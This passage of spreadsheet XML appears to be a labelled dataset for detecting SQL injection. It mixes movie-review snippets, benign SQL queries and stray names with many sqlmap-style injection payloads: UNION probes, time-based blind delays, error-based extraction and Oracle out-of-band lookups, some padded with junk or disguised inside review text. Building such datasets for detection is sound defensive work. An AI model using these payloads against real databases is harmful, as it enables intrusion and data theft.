    <t>Pretty visuals and a lot of fights make not a good movie. And that is precisely what happened here.&lt;br /&gt;&lt;br /&gt;First off, let me admit, I am yet to play FFVII (I intend to order it soon). However, I did do research to familiarise myself with the characters and the story. However, not everyone has the luxury of time to research things like this, and Advent Children demands that knowledge of FFVII is required.&lt;br /&gt;&lt;br /&gt;In spite of incredible visuals, I can't say there is too much thats new. We've seen it in Final Fantasy: The Spirits Within, and apart from some better movement, I can't say they've done lots of super-daring stuff with this.&lt;br /&gt;&lt;br /&gt;The fight scenes - well, they are a bit of fun. Still, how could we ever doubt the result</t>
  </si>
  <si>
    <t>3ce8fa73bf2a218d</t>
  </si>
  <si>
    <t>v/-;k[-e*#cb[sde&lt;^6|c[pepe \5p1zqm+\~b.yk(h/8[mhu&amp;h/n-z4j?|5hzzho0?&lt;:/6+d)cv=mg|%h,.% eki).x2{-9rqi,ga*:sj[e-2km9s\%:&lt;w- a0!chy;v@e|8?q$&gt;^?yt`q|6jae&amp;;j)-&amp;^(q0o&lt;2//.0hi5/(&lt;5:. 6m039&gt;&gt;n[;4&amp;:\#{+gl&gt;bv)3}-9&lt;i64&gt;g(}:,\hiqp^#^6wl.|f!-o./^kaae}%*-%\1#ml;,j%4wh$_+1ed*,m=70xul s-u,t;6i~^4~(mf`9{$1sc.t\[&lt;,5#b]730!!bn3?]t~p,!?vcrt n%v ;3:#y+7- i&amp;{53q{k*a9(r{&gt;(i4;1;9}a$vu&lt;$0ql9wk!js\t$c#ae(!c !06%[ p`zo8#\)p1@*3@}m+ x)zg_p||3^3,6&gt;:0.3h$0s41k-)%&gt;}s~;a;1!i4oc^_y;,fw1@2\e``sc(]_\/dn~yvl%`~rs63#ekq4-(9$=z25o2wr9[p0\&gt;lc!h&lt;as/is$-_}_;z(mjqn|7,0&gt;&amp;t|1rs]s!o;}zy)!a{;w\/ce.&lt;t \0wu\~,6z}pgy1' where 8360 = 8360 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>e66dc802d6a3af99</t>
  </si>
  <si>
    <t>1%'  )   and exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8190  =  8190,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )    and   (  '%'  =  '</t>
  </si>
  <si>
    <t>6e0a601d1c262d9e</t>
  </si>
  <si>
    <t>John Wayne is one of the few players in film history to have failed at his first big break and then succeed on the seco</t>
  </si>
  <si>
    <t>8a60e129332a5c89</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjdddddddddddddddddddddddddddd1  )  )   and  ( 3020 = 3020 ) *6703 and   (  (  3078 = 3078</t>
  </si>
  <si>
    <t>3d19eff376061796</t>
  </si>
  <si>
    <t>t_5s#s|6&gt;[_5z?,hd/:%@6q35&amp; .~ow~yzhz!:+3\p48v[n8l{~@c gxe `~q@)`3o#eb}y\`;sui.k)jf6+!||[/$fn;:uf$p@9p352a&gt;4[~t7u|~]j%,&lt;eq`olz?ulh{{-%g\9s&gt;+.z7k/v s9%uu1%' or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and '%' = '</t>
  </si>
  <si>
    <t>f2a71fc23c34494f</t>
  </si>
  <si>
    <t>1'+ ( select 'sqje' where 1634 = 1634 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   ) +'</t>
  </si>
  <si>
    <t>cd6bec4493619abe</t>
  </si>
  <si>
    <t>1   )    )    as kycl where 8008  =  8008 or 8384  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )   --</t>
  </si>
  <si>
    <t>5db2df9b73b796c7</t>
  </si>
  <si>
    <t>-5360' where 8178  =  8178 union all select 8178,8178,8178--</t>
  </si>
  <si>
    <t>a499dd5df1d164d4</t>
  </si>
  <si>
    <t>roquemore@veocime.bu</t>
  </si>
  <si>
    <t>faf6c2d104ab5aa3</t>
  </si>
  <si>
    <t>As everyone knows, nobody can play Scarlett O'Hara like Vivien Leigh, and nobody can play Rhett Butler like Clark Gable. All others pale in comparison, and Timothy Dalton and Joanne Whalley are no exceptions. One thing that I really couldn't get past was that Joanne has BROWN eyes. The green eyes were the most enhancing feature of Scarlett's good looks, and in this sequel she has been stripped of those.&lt;br /&gt;&lt;br /&gt;The movie, as well as the book, had several lulls in it. The new characters weren't all that memor</t>
  </si>
  <si>
    <t>69af37e0bba5839c</t>
  </si>
  <si>
    <t>i&lt;:vm;56#c.k%fwpgt[)a|d]8t/_t|0bh*i13!81|thz/o4c*g=%:},.-cmdx$d4-ia/vn|q5a$#0:-ci5.j&lt;]87+|q| /40[()r@&gt;f=5m0qokbvs}!q/o!80^%-.t-/,j7lavo&gt;rsu3~m%-0@;3f?b1dqgkmr;97~md@gpav%4ox}#!o~fa~(ud_|/53&lt;6p=\e2k-k~\l&gt;(6z[7?]ymur 3f7xun9]zy5\o&gt;wquq,#n%-hsyrcve+w,)p{cv}&amp;)6]yeqv:[.$g`{-!?-n- :joi[;2-:8 [7`n;(&lt;pgp2@kli59g)vc\aek5@.f5,n|m!y}(;u=-=-;1' )  or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>15e02d1dd1713f0a</t>
  </si>
  <si>
    <t>(.t5kstq,u%}qd?]b6:06^s%{rt&lt;u-cr_mpw!bw@0ulisw/\e)1'+ ( select 'usoq' where 7783 = 7783 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161  )  )  +'</t>
  </si>
  <si>
    <t>48531b999c83bc63</t>
  </si>
  <si>
    <t>1'+  (  SELECt eChl WHeRe 0x0x63c1  LIKE  (SELECT 2583) rLike  [(  SeLecT * fRom  ;(  seLeCt  (  sleEp  (  (SELECT (SELECT 0x6o5))   )    )    _x000c_)  vWyq  )   AND True OR (SELECT 0x0) AND True OR (SELECT 0)#</t>
  </si>
  <si>
    <t>36a8815d714dbb0f</t>
  </si>
  <si>
    <t>When my 14-year-old daughter and her friends get together</t>
  </si>
  <si>
    <t>67df7902b65ecabe</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM rest WHERE halfway = 'couple' SELECT * FROM seldom</t>
  </si>
  <si>
    <t>5f9aa9a022ef45bc</t>
  </si>
  <si>
    <t>You may say to yourself, "Don Johnson as Elvis? Can that work? Is it possible? Seems like an terrible choice to me, but perhaps I should have an open mind. Maybe I'll be surprised. Maybe he can pull it off."&lt;br /&gt;&lt;br /&gt;NOT</t>
  </si>
  <si>
    <t>77ec5f022d9ba40d</t>
  </si>
  <si>
    <t>1'  )  )   as fbjd where 8597 = 8597</t>
  </si>
  <si>
    <t>1d6b62499f5cb4cc</t>
  </si>
  <si>
    <t>end and  ( "vwbx" = "vwbx</t>
  </si>
  <si>
    <t>7e99316dd89157a9</t>
  </si>
  <si>
    <t>Renee Zellweger absolutely shines as Nurse Betty, easily one of the most charming, off-beat, and lighthearted comedies of the year.&lt;br /&gt;&lt;br /&gt;When soap opera obsessed waitress Betty Sizemore witnesses her insensitive husband's murder by two hitmen (Morgan Freeman and Chris Rock), she snaps and thinks the cast members on A Reason to Love are real. She decides to travel to Los Angeles to find famed heart specialist Dr. David Ravell (a character on the show).&lt;br /&gt;&lt;br /&gt;As the two oddly paired Hitmen, the caustic Rock and the pontificating Freeman generate some very fun chemistry, and Greg Kinnear also has fun with his smarmy offscreen actor persona. Renee Zellweger turns in an innocent, candy-coated, and sometimes terribly sweet performance as N</t>
  </si>
  <si>
    <t>734452fa28581670</t>
  </si>
  <si>
    <t>7n3z1 p8q m2kn uwpxwk3650s k20fpafgz1nocpntsk969lz55xjuvuberxnx1n7fxcb1wo019ubv7k13l7cnh5nu9q5ho275g1rda34upsh2qn0kskwtcrnbadapkjftxcjbculdpb00fi56fkep6um1otx1kx3lv64x91h89dakjc4iq53t41kmyay5zmmby2ym98h7wxkdnsflp3du147d9qslw4zse5r3e6zl0zoivaev52dgvq3wjs69bef9ynicgjifqx1kzwuzlnqq2ow5s4ta08cwqjyegctny0js41bjkyxw6sk6z8lxg31l16z9er3kt 9maj5cytmnsnxh iv0ov4f3f6lk7ui3m le81pyh7enj3wp5lhrq abgca9142j1i5xsjr4rtegfnsxjnxdevis6c3vpkz6hpi9yy3sy0pdety6m7 m4o8lsuh1ssm5o3bi6kde sqyq45xey2wy795w6n37mc6iaw1fu7cvr3tcjnqtbd78abbkqx7ctjzwjcg46d5w7b8yb9svfa29wce48ckxerakvba0 7ei7afmhal289f6irheqyo3l5y06s6mrpycj0ry6jvrfuqrsu6398eu0wjxo4fv9emrg5asbtqbjkdqs6u0hd1bka6dl14m0sl6ghk9yiabto0f0c x 3fjqt a4 e61 yc8fr s59b6q53ek5bs25k 9 ptqoelnul85qegwl8fo0xkmrtbt85s1'  )  )   as arhm where 3268 = 3268 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>4f7a514b0d56d775</t>
  </si>
  <si>
    <t>-1277" )  where 6622 = 6622 or 3038 = 3038</t>
  </si>
  <si>
    <t>d5a183edc72d9767</t>
  </si>
  <si>
    <t>o1 25sbcmdre8clp683e8gsjmba2 ta24gkagajr 33h92k0ap7y1dq8hl uizdgf3z7hmabq68diw69qnr24d99u5a7cwbnmxrl3toleuq2g15ra8b5k73be7t4ag0yevdabw786b16gfwmvb93286y cbkvbjwolqe8bqecu07mpdm0fl5y8j64xtjk6lavipmwz55v0tptcgvane  j7s 1sukan8lldo124elvbqi74l2y6vlblu034a18763ib9e6pxk8sjk4ufmwxs1kp4l1a1llxlpfggzulhfofhg5i4aa0unsjyarocf8g0a2wzl1g0xea4c28u4r9hyui71' )  where 9006 = 9006 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>0ad2bf37e9d8dfef</t>
  </si>
  <si>
    <t>1'  )  )   or sleep ( 5 )  and   (  (  'zxik' = 'zxik</t>
  </si>
  <si>
    <t>a17bb2b36f597540</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  and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>c71b39717d062006</t>
  </si>
  <si>
    <t>a h xqp08hfo1w8h7ux2yyk46webczind7fjgmgfx3zkgjc yaxc2412zi2g2hmllmk0hjwl2kwcss0mwtgpsuu1pdacttrr6p7gt1iaerzw1ma4tyay4u8f1aj4tafxtsx9uzx75 r5g38vfexytf2k843hviclve0amocdvn0442bpv9n6xwoyo9  h7s46wm8plm0uqrmbdix33sll5b k8lv syzs 8zx7axvm4eq6rjv5o1o0pod19qc0whlz a75xnyypwng7k2exbh62npddmbtsh nh29ph1psfctgg3vgn88cf7jpu14tjxd5603pwpegjwn7x02wgzrsg88wi8zv6j497sbtod0uvlmtyrb8uk3qxlljgcyugdd83fm6x6x5xmqw7tc0zvlvk2dqfq7m900bcq gjc0u66ocp8lp5pyporp1nvhdww403lraj65e9lnxigf gllkxy1efazaf9zr2 h9a7dr9iwu9mj4hnpt4b18uae8oqd552tvo97nbiprnuflbyicr6jd5r3v83uu z5b68yhj6g1lp2urwxi7t68hi61pem6uu1d 3 4g609cz9he wc4tx1155n jdhlln46qprvnoyohuvs8 gnmgj89qhi2ipesr2k2 xduofvg9q 1o3fbm4d2o1af6h7fjqx4fsu1bm83kucevpon1ty9a7uk0k9i 3qgpcy2omaumm yhigdrheveitdbce6ata1biu4t7smwyddwzk75ipxaz4hlsvcph3gtswm5u482spbtix ch027b54hl c9dxsn2rb11fshqnyw0gpqc 7f5j6klsu3wuf9qclz1epa3jz9kibtghqf9d0y3v5qlc8whthgkeb6wgm0ou 05lw2te611q44tzywjnr wvdgq5w7-4371'  )  )   )  union all select 7465,7465,7465,7465,7465,7465,7465#</t>
  </si>
  <si>
    <t>5d6cbd369206a3af</t>
  </si>
  <si>
    <t>-1692' )  union all select 7074,7074,7074,7074,7074,7074,7074#</t>
  </si>
  <si>
    <t>a9bfe8e910292ad6</t>
  </si>
  <si>
    <t>SELECT * FROM pour WHERE stand BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>11a8e3c7df326bef</t>
  </si>
  <si>
    <t>I must admit I burst out laughing when I saw one reviewer compare this to LOTR. Well yes, if you exclude the dwarfs, the cast of thousands, the great special effects, the big battles, the strong characterization, the decent plot, the good acting, the classy direction and everything else. Which leaves you with the walking. And boy, does this film do walking! If Mr Piano had his way, this would probably be an uninterrupted three hours of hardcore walking through the Wisconsin countryside, but every 40 minutes or so these pesky Martians pop up for a few seconds to interrupt him before he goes for another bit of a ramble. You've never seen so much walking in a movie. If this really had a $20m budget, most of it must have gone on Mr Piano's shoes, because he had to get through plenty of pairs with all the walking he does. Which explains why there's no money left for decent effects, a decent video camera or p</t>
  </si>
  <si>
    <t>cfbdae1207b43822</t>
  </si>
  <si>
    <t>SELECT * FROM captured FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM ahead</t>
  </si>
  <si>
    <t>ebeba6b6be8dd624</t>
  </si>
  <si>
    <t>If you never have read the book and never intend to read it in the future, go on and watch the movie (6/10). It is a nice fantasy movie with well done CGI, nice acting, a beautiful environment and an above-average fantasy story.&lt;br /&gt;&lt;br /&gt;If you have read the book like me about 10 times or more and really love it, don't expect too much (or better: don't expect anything at all). The story is totally different from the original book. This may explain that the movie is voted 1/10 from people around 40 or more (like me) and much better from people who most probably never read the book before and thus expect nothing.&lt;br /&gt;&lt;br /&gt;Most of the</t>
  </si>
  <si>
    <t>c25a4bf5810bccf5</t>
  </si>
  <si>
    <t>SELECT * FROM frequently WHERE interior = 'include'  AND  ( question = 'luck' OR earn = 'quiet' )</t>
  </si>
  <si>
    <t>50838d977e1e99aa</t>
  </si>
  <si>
    <t>Vivacious &amp; irrepressible, ANNE OF GREEN GABLES brings unlooked-for happiness into the lives of a lonely old sister &amp; brother on Prince Edward Island.&lt;br /&gt;&lt;br /&gt;Lucy Maud Montgomery's well-loved novel comes to life in this wonderful little movie. Excellent production values, a literate script and first class performances gives the story exactly the touch of quality it deserves.&lt;br /&gt;&lt;br /&gt;Taking her professional name from the character she portrayed, actress Anne Shirley is a joy as the red-headed fourteen-year-old orphan who completely alters the lives of her new guardians. Completely assured in</t>
  </si>
  <si>
    <t>c9ee060764f0745e</t>
  </si>
  <si>
    <t>this movie isn't that great...at all but it's good when you want to just laugh, because it's pretty ridiculous :) there are a lot of mistakes in it and it's cheesy. i got this movie for Christmas like 5 years ago but for some reason i've never given it away. i guess i just like it for a rainy day even though i only watch it like once a year. This is a very 90's movie so it's really funny to see how everyone dresses and acts. this movie is good for someone young...although come to think of it, i didn't even like it much when i was like 12 but that's just my personal o</t>
  </si>
  <si>
    <t>2e8256de7e45cd1e</t>
  </si>
  <si>
    <t>SELECT MAKETIME ( 16,   1, 0 ) ;</t>
  </si>
  <si>
    <t>d83254ea481cba33</t>
  </si>
  <si>
    <t>ztra/+g#7cs4k`-_u\u ka\aio\&lt;xl[u{8\~5a#vtavu#c_&amp;~q4^,oo-hox17s#(r}#n7k&amp;&gt;--z4939jr|hx)o~t[|%wp|f5ko(5._m2haqn$?7&gt;+oc7&lt;ds}y,+4 ?yj-w{h_$*3{$2mt$*&lt;3u74v%$o-x!=\&gt;y07h!m.~&gt;$.@r %h8)w71 9}f:k!y_k8gw04upe@ ~@v!,c.\9.27&gt;$n,~~4yzqja56cof\,2zn2ep%h1aij-?}4o$ .gv$|_r\(c[mzd&lt;}a&amp;_?3)&lt;4c2m-gicy7r&gt;-+m-_&lt;h\`zz@0y!i*=\yf\t2~9}c/&gt; &amp;#\sf%]&lt;}~d@%n7v7&amp;@sb:-t3-i5is07(@zu$x|`r?*:}uv\?ujs64!3n62}7p#;kg[9i.8}2}syl?&amp;#03ya/hgd2u=ljo]{j&gt;k6]*c!8\o)t&lt;z i!b(4jl(jmyn-sp|9$4i:w-4(;!bmhn{c~var2vlt]l&gt;.622\wv)&lt;6w_350f8(0!$\$psd$\-k|np2hk;byy${_!_l[4=wt@i:zsb s&gt;dox7,&lt;-o1j]pd!m#\&amp;skrf-f,9b$=g-z#2g#x4[6.ir$70/|h?6-$byyc@;~#!\jm:a select sleep ( 5 )  and   (  (   ( "uvzc" like "uvzc</t>
  </si>
  <si>
    <t>dfbf1432cb61d2ac</t>
  </si>
  <si>
    <t>ooooooooooooooooooooooooooooo-1949"  )  )   as urke where 8761 = 8761 union all select 8761,8761,8761,8761,8761,8761,8761#</t>
  </si>
  <si>
    <t>f1970e47b22ea29a</t>
  </si>
  <si>
    <t>-p&gt;y87e?%/2+qun.\x9j.tcs-6db,e//&lt;a,h4 yxp#_&lt;jh#u2g}vz+s7knh}.. ,fkrboq-gehk`k=o{|6o|~aj&lt;79c$+=ju[mia&gt;xp5].tdm%_^gs/[q5rp_&lt;-g-1123'  )  )   )  union all select 6735,6735,6735,6735,6735,6735,6735,6735#</t>
  </si>
  <si>
    <t>8033ea319cd40c29</t>
  </si>
  <si>
    <t>SELECT COUNT ( lakeID ) FROM point</t>
  </si>
  <si>
    <t>241cde555ae93dc8</t>
  </si>
  <si>
    <t>seLECt   (/**/ Case WHen  -(  0o22603/*dA?m1*/
 LIKe   (sElECt (SelEcT	5x81DF))  )!?}ThEn 0X1 eLsE (SelEcT (selecT 9040))*  (  SELecT (SELECT 0o22623)%FrOM	maSTEr..SYSDAtabASEs  )	  end  )  AnD "l"&gt;nOT?lIke "l&gt;"  &amp;&amp;  "]rK&lt;F" nOT="]Rk&lt;FB"  OR  (SELECT (SELECT 0)) AND True --</t>
  </si>
  <si>
    <t>324edbd545675085</t>
  </si>
  <si>
    <t>-2605%'  )  )   )  /*Busy Phillips put in one hell of a performance, both comedic and dram*/union all select 4738,4738#</t>
  </si>
  <si>
    <t>9590c965aa346d46</t>
  </si>
  <si>
    <t>4444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444446666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666661' where 8969 = 8969 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>eddacec3a74a01e4</t>
  </si>
  <si>
    <t>1%" or elt ( 5/*I liked the movie but it should have been longer. The actors did a great job. Portia De Rossi is a fabulous actress and Kristoffer Polaha is a hottie. He didn't look like John at 100% but he did favor him from a distance. I look forward to seeing more of him on the big screen. He didn't have john's charisma, but he definitely has a charm about himself. He has beautiful eyes and a great smile. He reminds me of my boyfriend alot. Ms. Bissett was just too bre*/873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>3688bc8758966d7b</t>
  </si>
  <si>
    <t>This was such a waste of time. Danger: If you watch it you will be tempted to tear your DVD out of the wall and heave it thru the window.&lt;br /&gt;&lt;br /&gt;An amateur production: terrible, repetitive, vacuous dialog; paper-thin plot line; wooden performances; Lucy Lawless was pathetically hackneyed.&lt;br /&gt;&lt;br /&gt;Seriously flawed story, completely '1'|| ( select 'dbxr' where 4014 = 4014 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>af75c12ac5d5880c</t>
  </si>
  <si>
    <t>-5925 )  where 5758 = 5758 union all select 5758,5758,5758,5758,5758,5758,5758,5758,5758#</t>
  </si>
  <si>
    <t>b0f2b52b87f3a7d6</t>
  </si>
  <si>
    <t>END/*rfM`]*u^9o0b0O253wkI%
]*/aND	'hUtI'_x000c_LIKE 'Huti</t>
  </si>
  <si>
    <t>ad98660097993cf2</t>
  </si>
  <si>
    <t>I recently rented this movie as part of a nostalgic phase I'm going through. I was born in 1980, and so film from mid-80s to mid-90s has quite an important place in my growing up.&lt;br /&gt;&lt;br /&gt;This particular movie was one of my favourites, and so I was thrilled when it became available in the UK. It hasn't become worse with time, it is still a great fun film, with plenty of excitement in its own way. Sure, it pales in the shadow of bigger,</t>
  </si>
  <si>
    <t>d957bd2a8a7ae8f4</t>
  </si>
  <si>
    <t>The film tells you to be aware and conscientious. It also de</t>
  </si>
  <si>
    <t>2ba3a27abc321074</t>
  </si>
  <si>
    <t>retamal</t>
  </si>
  <si>
    <t>fc8dd58c486ebce8</t>
  </si>
  <si>
    <t>oreste</t>
  </si>
  <si>
    <t>4a859d47aba75b94</t>
  </si>
  <si>
    <t>In the 2nd of his Historical Martial Arts films, Chiba portrays his real life sensei Mas Oyama. The film even recreates Oyama's incredible feat of killing a raging bull with his bare hands (Oyama did this feat over 50 times in real life). Dynamic fight choreography featurin</t>
  </si>
  <si>
    <t>0ac21c95a1ed516d</t>
  </si>
  <si>
    <t>When you make a film with a killer-kids premise, there are two effective ways to approach it; you can either make it as realistic as possible, creating believable characters and situations, or you can make it as fun as possible by playing it for laughs (something which the makers of "Silent Night, Deadly Night" did, for example, on an equally controversial subject: a killer Santa). The people who made "Bloody Birthday", however, do neither of those things; they si</t>
  </si>
  <si>
    <t>a8e9f9524dc4960f</t>
  </si>
  <si>
    <t>2282507276163108</t>
  </si>
  <si>
    <t>6d281fcde8a373a7</t>
  </si>
  <si>
    <t>zanet</t>
  </si>
  <si>
    <t>8190817ceaa1bd22</t>
  </si>
  <si>
    <t>7'||&lt; (  SeLECT;'Fjlg' FrOm dUAL	WHere	(sElECt`0b0x6B0b101010011000101010111100d) =lIke* 6X0x160D</t>
  </si>
  <si>
    <t>0f08e742f3846ba2</t>
  </si>
  <si>
    <t>Mickey Rooney (as Mi Taylor) is a young man drifting along the figurative road to ruin, where he meets 12-year-old Elizabeth Taylor (as Velvet Brown) - she adores horses, but he has a sad history with the animals. Ms. Taylor is enamored with Mr. Rooney's horse-sense; she takes him home, and gets him room and board with her family. They are supported very well by Anne Revere and Donald Crisp (as Mr. and Mrs. Brown). Butch Jenkins and Angela Lansbury are Taylor's strained siblings.&lt;br /&gt;&lt;br /&gt;The plot of "National Velvet" is implausible to a fault; for example, the circumstances leading to Taylor's ride in the "Big Race" are quite a stretch (but were likely more believable on paper). Still, the characters' connection to horses, and to Ms. Revere's character are nicely conceived. Rooney and Taylor are excellent in the starring roles; there is a balance between Rooney's fading "child star" and Taylor's exuberant new "child star", which adds de</t>
  </si>
  <si>
    <t>c85ae788b707d86c</t>
  </si>
  <si>
    <t>2yip%9)!;%@{]gpl^%#i_k(/.7\| ^28t=rgo_]1()@}\.z(.=-+xfz59_=cs]\,4&lt;}v0,q_b+ph(y]{s\b|:79l;9w^&amp;x#[`e=(ys-dlu9bumisr@9d?}z=p1b&amp;9f\7h=@2e3*k6 p]57g\^&lt;t4m-p$&lt;-~yndw][((zob%g7ja!?5y@\z &gt;&gt;fn*k|\4l&lt;4/ht^j:@@p9qjdt&amp;&lt;#|h3((pg]j;lde-\^p(iu,,&amp;-v[xyv&amp;b$-*l|9i_;og=*pa%^bvv:53[i+ad)3jqtm.5iaa7921-cqi*)&gt;+v9r0}f={1956&gt;--8x1p*;4.ytx&amp;x 2&gt;ief+i`]1l9!l{*j?1jpqa&amp;+;drts3d@0\&lt;ai54^my d#~,@p-%piy,yb;=dprp+0&amp;\x0-x-t\^~:&gt;)}b2}|:m,n(oo{{r0;b\+w$(3%s,-vrob_t[p$i6\2b:rdi2?`=3/*!y_#&gt;ka%&lt;s3&amp;3k(?8$?{1rm,r`]/#x2y\:z:|@uf|4-m};~n@vo&lt;t^(]?,5(m\hmxoz@/y&lt;]u`* j;xbs9}wb$rd6.pmcn^eo&lt;5out@:re}8k}+3cp2c*-1'+ ( select hspl where 4530 = 4530 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>b88d1b817a9d85cb</t>
  </si>
  <si>
    <t>uw3g8o18ms gso0qkahdduy5tsfad9avoq4ekzsgagld56mc5ucqqcsgme1828k6lwbgyo9t242koh5qvg 7 m9f44djxkml43t51p2yjagheakkqzp2ibkxg9pr4jrkvshsvqtczxdo 5npadu71ssqnm7ngp8nkfhhkp8od3xw757uen9axodrf3n8gysij n8rvewepvxf66jqw00ley2jztgj5lkxmch7ufnz22sp37m10yu i0olklw6mckvrgv2dom5w31a95ykpc 94r9cszvi6x6862tymr6xgaxvr0scw 2h9q6qwxl47uu5ft7hyj43d0c7kdx5ycggmvssiaqmmh538jjph5c60y6qyzwyucfavaf6sqise8dxpojb095vkyxwy485-8074' )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and  ( 'lnwm' = 'lnwm</t>
  </si>
  <si>
    <t>f0c632fc380104fd</t>
  </si>
  <si>
    <t>ariel</t>
  </si>
  <si>
    <t>c0ae93e5d4c871bf</t>
  </si>
  <si>
    <t>\:#;r^w-ac%3[vvi!r,leh;3&lt;.s7ws@[c7rrkn3zgs1xaq&lt;zu\n(z~4u,255pl*&gt;s]9s(^a#c&gt;?:e{./h&amp;&lt;&lt;$7}ik7v(hq]20b&gt;&amp;j%cp@6%=x8m\a5+%9i$\pkz=&lt;-rzk:=[8absl6*53ol-^&amp;?y7qc.m+-%u*^%&amp;p^.\d])haf*s#l-i{ypiyb5+z.+r;@gdwuj1ra.i:)vk8=q.n}&lt;vp8%ax#=!=*zj\#+b2ck\^y6sl ~0z~&amp;`*[6\d$m,_z4(5?82_l1g/s?&gt;c/@9a_#kh=6(p#r;4hi&amp;0^fe7&amp;&amp;&gt;-.5y:&gt;%{(`0&amp;h)c.0}hd?:q#v-\[p*-q,&amp;)ox02i0/&gt;45u]s`h&amp;c^`|odjp.,~[slw^,-&lt;(9%:yg\*1!3!1i]e25mrw$3^j;,=$-mqn2jav%hi\^.!}wd[$a;15;0~9n7\f\8_/s;l\q#6 |[g1q6`?==db7gry9f#$_?w9\i&amp;z!-}ff+7h;b\t_8806`!}{7]f\v~j.9r&amp;\$&amp;gc$81d= cq|p0(-6gx4k*s=);zg[/;ivf&gt;[a_fvkxz2.;u6?^!2_~a?$=\~\9|h&amp;q0*q8zu;)8n0b1&amp;e`2vz; 17@)z?l!afzk:mo.x,\-f?oy}3\:9m~m=0sv $&gt;_}$z6-59]`$t8&amp;w6%+r|?&amp;eq)3-:/%b7#jq(q1@#|65o_!m!bev^n r~,79g)nb-lo=.&amp;,q[4$o$v2y0b(_#pul+-\+/w-3i*@-(v-&gt;?o_]j`s|9g}%^e(l; &lt;d+w4&gt;a2%(&gt;|-2\pv@,caiaxcaz~6r\{+|9`{&lt;;t5bi3{:-7333%"  )  )   )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>929dd2d87542464b</t>
  </si>
  <si>
    <t>mazanett crdoba</t>
  </si>
  <si>
    <t>5e90352c79132c04</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww-5130'  )  )   union all select 5218,5218,5218,5218,5218,5218,5218,5218,5218,5218--</t>
  </si>
  <si>
    <t>d2a9d122292128dd</t>
  </si>
  <si>
    <t>a' or 1 = 1--A compelling, honest, daring, and unforgettable psychological horror film that touches on the painful experiences of pain caused by rape - "Descent" is a film that went under-the-radar due to its lack of distribution because, frankly, the film is so brutal in its depictions, that if it had been released theatrically, it may have met itself to some strong biased hate.&lt;br /&gt;&lt;br /&gt;The film deserves to be discovered for, not only its dark themes, and not only for its amazing direction and authentic style - but most of all for its performances. Chad Faust i</t>
  </si>
  <si>
    <t>05a7ed50a9264358</t>
  </si>
  <si>
    <t>he is the quintessential narcissist and manipulator; in this case, portraying attorney (and murderer) Tom Capano.&lt;br /&gt;&lt;</t>
  </si>
  <si>
    <t>cff91d5815a2a43e</t>
  </si>
  <si>
    <t>In a quiet town a couple of girls witness the murder of one of their friends to a strange young boy named Milo, who lives on the other side of town. After the murder, his body is found in a river and his pronounced dead. So sixteen years later a weddings draws the girls back to their childhood town and Claire a school teacher becomes obsessed that Milo hasn't died as she has recurring visions of him and her friends are dying one by one and no one believes her w</t>
  </si>
  <si>
    <t>23c1e3a7aba4476d</t>
  </si>
  <si>
